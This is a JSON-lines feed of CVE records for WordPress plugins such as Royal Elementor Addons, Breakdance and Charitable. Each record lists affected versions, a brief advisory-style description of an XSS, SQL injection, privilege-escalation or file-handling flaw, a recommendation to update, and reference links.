{"CVE_ID":"CVE-2024-9682","slug":"royal-elementor-addons","versionImpact":"1.7.1001","versionEndExcluding":"1.7.1002","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Form Builder widget in all versions up to, and including, 1.7.1001 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd90b85e-22a9-4c08-b2cf-4f75406e7ca3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd90b85e-22a9-4c08-b2cf-4f75406e7ca3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/assets\\\/js\\\/frontend.js?rev=3184222#L8771\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/assets\\\/js\\\/frontend.js?rev=3184222#L8771\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9668","slug":"royal-elementor-addons","versionImpact":"1.7.1001","versionEndExcluding":"1.7.1002","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 1.7.1001 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e39f0b-eb4c-4568-9f5a-60a0dc3eb6ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e39f0b-eb4c-4568-9f5a-60a0dc3eb6ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?rev=3184222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?rev=3184222\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9059","slug":"royal-elementor-addons","versionImpact":"1.7.1001","versionEndExcluding":"1.7.1002","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Maps widget in all versions up to, and including, 1.7.1001 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37223d1f-82c8-414f-bf39-63e728541aa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37223d1f-82c8-414f-bf39-63e728541aa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/google-maps\\\/widgets\\\/wpr-google-maps.php?rev=3184222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/google-maps\\\/widgets\\\/wpr-google-maps.php?rev=3184222\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9356","slug":"yotpo-social-reviews-for-woocommerce","versionImpact":"1.7.9","versionEndExcluding":"1.7.10","description":"The Yotpo: Product & Photo Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'yotpo_user_email' and 'yotpo_user_name' parameters in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f7ddb34-cb5b-4089-bd3e-07056f0b6bd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f7ddb34-cb5b-4089-bd3e-07056f0b6bd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotpo-social-reviews-for-woocommerce\\\/trunk\\\/lib\\\/utils\\\/wc-yotpo-settings-functions.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotpo-social-reviews-for-woocommerce\\\/trunk\\\/lib\\\/utils\\\/wc-yotpo-settings-functions.php#L100\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10504","slug":"arforms-form-builder","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The Contact Form, Survey, Quiz & Popup Form Builder  WordPress plugin before 1.7.1 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a22df11-0e24-4248-a8f3-da8f23ccb313\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a22df11-0e24-4248-a8f3-da8f23ccb313\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6698","slug":"wp-fundraising-donation","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The FundEngine plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.0. This is due to the plugin not properly verifying user meta updated through the update_user_meta function. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta which can be leveraged to update their capabilities to gain administrator access.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec6cf42-291b-452d-ad14-80ae1cd5ec5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec6cf42-291b-452d-ad14-80ae1cd5ec5c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3128099%40wp-fundraising-donation%2Ftrunk&old=3072093%40wp-fundraising-donation%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3128099%40wp-fundraising-donation%2Ftrunk&old=3072093%40wp-fundraising-donation%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2103","slug":"soundrise-music","versionImpact":"1.6.11","versionEndExcluding":"1.7.1","description":"The SoundRise Music plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on theironMusic_ajax() function in all versions up to, and including, 1.6.11. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soundrise-artists-producers-and-record-labels-wordpress-theme\\\/19764337\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soundrise-artists-producers-and-record-labels-wordpress-theme\\\/19764337\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8c0f9d8-c5cf-4e31-bc0b-289ad7c1d197?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8c0f9d8-c5cf-4e31-bc0b-289ad7c1d197?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4651","slug":"justified-gallery","versionEndExcluding":"1.7.1","description":"The Justified Gallery WordPress plugin before 1.7.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8182075-7472-48c8-8e9d-94b12ab6fcf6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8182075-7472-48c8-8e9d-94b12ab6fcf6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-29096","slug":"contact-form-to-db","versionEndExcluding":"1.7.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BestWebSoft Contact Form to DB by BestWebSoft \u2013 Messages Database Plugin For WordPress.This issue affects Contact Form to DB by BestWebSoft \u2013 Messages Database Plugin For WordPress: from n\/a through 1.7.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5601","slug":"woocommerce-ninjaforms-product-addons","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The WooCommerce Ninja Forms Product Add-ons WordPress plugin before 1.7.1 does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0035ec5e-d405-4eb7-8fe4-29dd0c71e4bc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0035ec5e-d405-4eb7-8fe4-29dd0c71e4bc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8656","slug":"wpcodefactory-helper","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The WPFactory Helper plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb62eefe-9993-43f7-b3ae-de47c0951bee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb62eefe-9993-43f7-b3ae-de47c0951bee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcodefactory-helper\\\/tags\\\/1.7.0\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpcodefactory-helper\\\/tags\\\/1.7.0\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150715\\\/wpcodefactory-helper\\\/tags\\\/1.7.1\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3150715\\\/wpcodefactory-helper\\\/tags\\\/1.7.1\\\/includes\\\/class-alg-wpcodefactory-helper-site-key-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8152","slug":"easy-sticky-sidebar","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The WP CTA \u2013 Call To Action Plugin, Sticky CTA, Sticky Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_cta_status' and 'change_sticky_sidebar_name' functions in all versions up to, and including, 1.7.0. This makes it possible for unauthenticated attackers to update the status of a sticky and update the name displayed in the back-end WP CTA Dashboard.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-sticky-sidebar\\\/trunk\\\/inc\\\/ClassActions.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336867%40easy-sticky-sidebar&new=3336867%40easy-sticky-sidebar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336867%40easy-sticky-sidebar&new=3336867%40easy-sticky-sidebar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981ed50b-8f03-4320-99f0-3f53f7b2fc44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981ed50b-8f03-4320-99f0-3f53f7b2fc44?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2890","slug":"td-subscription","versionImpact":"1.7","versionEndExcluding":"1.7.1","description":"The tagDiv Opt-In Builder plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018subscriptionCouponId\u2019 parameter in all versions up to, and including, 1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/newspaper-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-opt-in-builder\\\/\",\"name\":\"https:\\\/\\\/tagdiv.com\\\/tagdiv-opt-in-builder\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/newspaper\\\/5489609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff1cff1-6745-4124-ba93-8b0749eae61a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fff1cff1-6745-4124-ba93-8b0749eae61a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3356","slug":"subscribers-text-counter","versionEndExcluding":"1.7.1","description":"The Subscribers Text Counter WordPress plugin before 1.7.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack, which also lead to Stored Cross-Site Scripting due to the lack of sanitisation and escaping","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93faad5b-e1e8-4e49-b19e-b91343d68b51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/93faad5b-e1e8-4e49-b19e-b91343d68b51\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6854","slug":"breakdance","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The Breakdance plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom postmeta output in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping on user supplied post meta fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e92a0387-bd09-46d3-9f6c-09f701b9e550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e92a0387-bd09-46d3-9f6c-09f701b9e550?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-1-now-available-security-update\\\/\",\"name\":\"https:\\\/\\\/breakdance.com\\\/breakdance-1-7-1-now-available-security-update\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4404","slug":"charitable","versionEndExcluding":"1.7.0.13","description":"The Donation Forms by Charitable plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.7.0.12 due to insufficient restriction on the 'update_core_user' function. This makes it possible for unauthenticated attackers to specify their user role by supplying the 'role' parameter during a registration.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/522ecc1c-5834-4325-9234-79cf712213f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/522ecc1c-5834-4325-9234-79cf712213f3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.7.0.12\\\/includes\\\/users\\\/class-charitable-user.php#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.7.0.12\\\/includes\\\/users\\\/class-charitable-user.php#L866\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8738","slug":"seriously-simple-stats","versionImpact":"1.6.0","versionEndExcluding":"1.7.0","description":"The Seriously Simple Stats plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7f810f6-b8dd-4065-8113-9842b33202ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7f810f6-b8dd-4065-8113-9842b33202ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-stats\\\/trunk\\\/php\\\/classes\\\/class-ssp-stats.php#L1296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seriously-simple-stats\\\/trunk\\\/php\\\/classes\\\/class-ssp-stats.php#L1296\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153423%40seriously-simple-stats&new=3153423%40seriously-simple-stats&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153423%40seriously-simple-stats&new=3153423%40seriously-simple-stats&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13845","slug":"gravityformswebhooks","versionImpact":"1.6.0","versionEndExcluding":"1.7.0","description":"The Gravity Forms WebHooks plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.6.0 via the 'process_feed' method of the GF_Webhooks class This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.gravityforms.com\\\/blog\\\/brand-new-release-webhooks-add-on-1-7\\\/\",\"name\":\"https:\\\/\\\/www.gravityforms.com\\\/blog\\\/brand-new-release-webhooks-add-on-1-7\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9311b20b-daad-408f-a1a0-d1e42573ab97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9311b20b-daad-408f-a1a0-d1e42573ab97?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3129","slug":"url-shortify","versionEndExcluding":"1.7.0","description":"The URL Shortify WordPress plugin before 1.7.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5717d729-c24b-4415-bb99-fcdd259328c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5717d729-c24b-4415-bb99-fcdd259328c4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0610","slug":"woo-payment-gateway-for-piraeus-bank","versionImpact":"1.6.5.1","versionEndExcluding":"1.7.0","description":"The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'MerchantReference' parameter in all versions up to, and including, 1.6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f17c4748-2a95-495c-ad3b-86b272855791?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f17c4748-2a95-495c-ad3b-86b272855791?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-23179","slug":"lead-form-builder","versionEndExcluding":"1.7.0","description":"The Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.0 does not escape some of its form fields before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90b8af99-e4a1-4076-99fa-efe805dd4be4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90b8af99-e4a1-4076-99fa-efe805dd4be4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7626","slug":"delicious-recipes","versionImpact":"1.6.9","versionEndExcluding":"1.7.0","description":"The WP Delicious \u2013 Recipe Plugin for Food Bloggers (formerly Delicious Recipes) plugin for WordPress is vulnerable to arbitrary file movement and reading due to insufficient file path validation in the save_edit_profile_details() function in all versions up to, and including, 1.6.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php). This can also lead to the reading of arbitrary files that may contain sensitive information like wp-config.php.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L260\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L260\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L355\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delicious-recipes\\\/tags\\\/1.6.7\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php#L355\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148996\\\/delicious-recipes\\\/trunk\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148996\\\/delicious-recipes\\\/trunk\\\/src\\\/dashboard\\\/class-delicious-recipes-form-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3552","slug":"web-directory-free","versionImpact":"1.6.9","versionEndExcluding":"1.7.0","description":"The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34b03ee4-de81-4fec-9f3d-e1bd5b94d136\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34b03ee4-de81-4fec-9f3d-e1bd5b94d136\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3414","slug":"structured-content","versionImpact":"1.6.4","versionEndExcluding":"1.7.0","description":"The Structured Content (JSON-LD) #wpsc WordPress plugin before 1.7.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dd322b5-3c1d-4da7-8737-e6688fc9f4df\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dd322b5-3c1d-4da7-8737-e6688fc9f4df\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dd322b5-3c1d-4da7-8737-e6688fc9f4df\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1dd322b5-3c1d-4da7-8737-e6688fc9f4df\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
